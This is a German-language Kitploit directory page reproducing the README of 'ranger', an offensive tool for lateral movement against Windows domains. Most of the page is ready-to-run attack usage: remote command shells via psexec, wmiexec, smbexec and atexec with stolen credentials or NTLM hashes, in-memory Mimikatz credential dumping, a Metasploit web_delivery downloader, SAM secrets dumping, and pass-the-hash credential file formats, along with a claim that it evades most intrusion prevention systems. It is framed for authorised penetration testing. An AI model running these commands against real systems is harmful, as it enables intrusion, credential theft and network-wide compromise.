Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ranger — Ein Tool für Sicherheitsexperten, um auf entfernte Microsoft Windows-basierte Systeme zuzugreifen und mit ihnen zu interagieren. | Kitploit
Tools/GitHubGitHub/funkandwagnalls/ranger
Payload-GenerierungExploitationLaterale BewegungPost-ExploitationPenetrationstestsCommand and Control
GitHubfunkandwagnalls/ranger

ranger

Ein Tool für Sicherheitsexperten, um auf entfernte Microsoft Windows-basierte Systeme zuzugreifen und mit ihnen zu interagieren.

Repository anzeigen
4318216vor 10 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ranger

Ein Werkzeug zur Unterstützung von Sicherheitsexperten beim Zugriff auf und der Interaktion mit entfernten Microsoft Windows-basierten Systemen.

Dieses Projekt wurde mit dem Gedanken konzipiert, dass wir weder den Bogen noch den Pfeil erfunden haben, sondern nur eine effizientere Art der Nutzung.

Ranger ist ein kommandozeilenbasiertes Angriffs- und Penetrationstest-Werkzeug, das die Fähigkeit besitzt, einen instantiierten Katapult-Server zu verwenden, um Fähigkeiten gegen Windows-Systeme auszuliefern. Solange ein Benutzer einen Satz von Anmeldeinformationen oder einen Hash-Satz (NTLM, LM, LM:NTLM) besitzt, kann er auf Systeme zugreifen, die Teil der Vertrauensstellung sind.

Mit dieser Fähigkeit kann ein Sicherheitsexperte Anmeldeinformationen im Klartext aus dem Speicher extrahieren, auf SAM-Tabellen zugreifen, Befehle ausführen, PowerShell-Skripte, Windows-Binärdateien und andere Werkzeuge ausführen. Derzeit umgeht das Werkzeug die Mehrheit der IPS-Herstellerlösungen, es sei denn, sie wurden speziell darauf abgestimmt, es zu erkennen. Das Werkzeug wurde in unseren Heimlaboren entwickelt, um Sicherheitsexperten bei rechtlich und/oder vertraglich unterstützten Aktivitäten zu unterstützen.

Weitere Funktionen werden hinzugefügt, aber derzeit nutzt das Werkzeug die Community-Beiträge aus Repositorys der Teams PowerView, PowerShell Mimikatz und Impacket.

Ranger verwalten:

Installation:

wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Update:

ranger --update

Verwendung:

  • Ranger verwendet eine Kombination von Methoden und Angriffen, eine Methode dient zur Auslieferung eines Angriffs/Befehls.
  • Ein Angriff ist das, was Sie erreichen möchten.
  • Einige Elemente sind sowohl Methode als auch Angriff in einem, und manche Methoden können aufgrund aktueller Einschränkungen in den Bibliotheken oder Protokollen einige der Angriffe nicht verwenden.

Methoden & Angriffe:

--scout
--secrets-dump

Methode:

--wmiexec
--psexec
--smbexec
--atexec

Angriff:

--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

Befehlsausführung:

Angemeldete Benutzer finden:

ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

SMBEXEC Befehlsshell:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

PSEXEC Befehlsshell:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

PSEXEC Befehlsausführung:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

WMIEXEC Befehlsausführung:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

WMIEXEC PowerShell Mimikatz Speicherinjektor:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

WMIEXEC Metasploit web_delivery Speicherinjektor (erfordert Metasploit-Konfiguration, siehe unten):

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

WMIEXEC Benutzerdefinierter Code-Speicherinjektor:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"

ATEXEC Befehlsausführung:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

ATEXEC PowerShell Mimikatz Speicherinjektor:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder

ATEXEC Metasploit web_delivery Speicherinjektor (erfordert Metasploit-Konfiguration, siehe unten):

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder

ATEXEC Benutzerdefinierter Code-Speicherinjektor:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder

SECRETSDUMP Benutzerdefinierter Code-Speicherinjektor:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

Einfügbaren Mimikatz-Angriff erstellen:

ranger.py --invoker -q -v -vv -vvv

Einfügbaren web_delivery-Angriff erstellen (erfordert Metasploit-Konfiguration, siehe unten):

ranger.py --downloader -q -v -vv -vvv

Einfügbaren Executor-Angriff erstellen:

ranger.py --executor -q -v -vv -vvv

Identifizieren von Gruppenmitgliedern und Domänen

  • Stellen Sie bei der Identifizierung von Gruppen sicher, dass Sie die tatsächliche Abfragedomäne mit --get-domain-membership bestimmen.
  • Wenn Sie dann eine Gruppe abfragen, verwenden Sie die optionale --domain, mit der Sie eine andere Domäne als die, bei der Sie angemeldet sind, anvisieren können.
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

Hinweise zur Verwendung:

Format der Anmeldedaten-Datei:

  • Sie können eine Liste von Benutzernamen und Passwörtern oder Hashes im folgenden Format in derselben Datei übergeben:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM  domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain

Einschränkungen der Anmeldedaten-Datei:

  • Wenn Sie in der Datei Domänennamen angeben, werden diese anstelle von WORKGROUP verwendet.
  • Wenn Sie den Domänennamen über die Befehlszeile mit -d angeben, wird davon ausgegangen, dass Sie alle Domänennamen in der Datei ignorieren möchten.

Befehlszeilenausführung:

  • Wenn Sie die Datei nicht verwenden möchten, können Sie die Details direkt über die Befehlszeile übergeben.
  • Wenn Sie anstelle von Passwörtern Hashes übergeben möchten, geben Sie diese einfach über das Passwort-Argument ein.
  • Wenn sie im PWDUMP-Format sind und Sie keinen Benutzernamen angeben, wird der Benutzername aus dem Hash extrahiert.
  • Wenn Sie einen Benutzernamen angeben, wird angenommen, dass derselbe Hash für einen anderen Benutzer gilt.
  • Verwenden Sie die folgenden Formate für das Passwort:
password
LM:NTLM
:NTLM
PWDUMP

Ziele und Ausschlüsse:

  • Ziele und Ausschlüsse können gleichzeitig verwendet werden

Ziele, Zielbereiche, Ziel-CIDRs, Ziellisten, NMAP-XML-Ziele:

  • Sie können eine Liste von Zielen entweder über eine Zielliste oder über die Zieloption bereitstellen.
  • Sie können mehrere Ziellistendateien durch Kommas getrennt angeben. Das Werkzeug aggregiert die Daten, entfernt Duplikate und schließt dann Ihre IP-Adresse vom Standard-Interface oder dem von Ihnen angegebenen Interface aus.
  • Das Werkzeug akzeptiert CIDR-Notationen, kleine Bereiche (192.168.195.1-100) oder große Bereiche (192.168.194.1-192.163.1.1) oder einzelne IP-Adressen.
  • Auch hier einfach durch Kommas getrennt in der Befehlszeile oder in einer durch Zeilenumbrüche getrennten Datei.
  • Nmap-XMLs können ebenfalls verwendet werden, um Systeme anzuvisieren; auch dies kann durch Kommas getrennt werden.
  • Das Werkzeug normalisiert und entfernt Duplikate, bevor es Boxen anvisiert.
  • BEISPIEL: -t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml
Tool herunterladen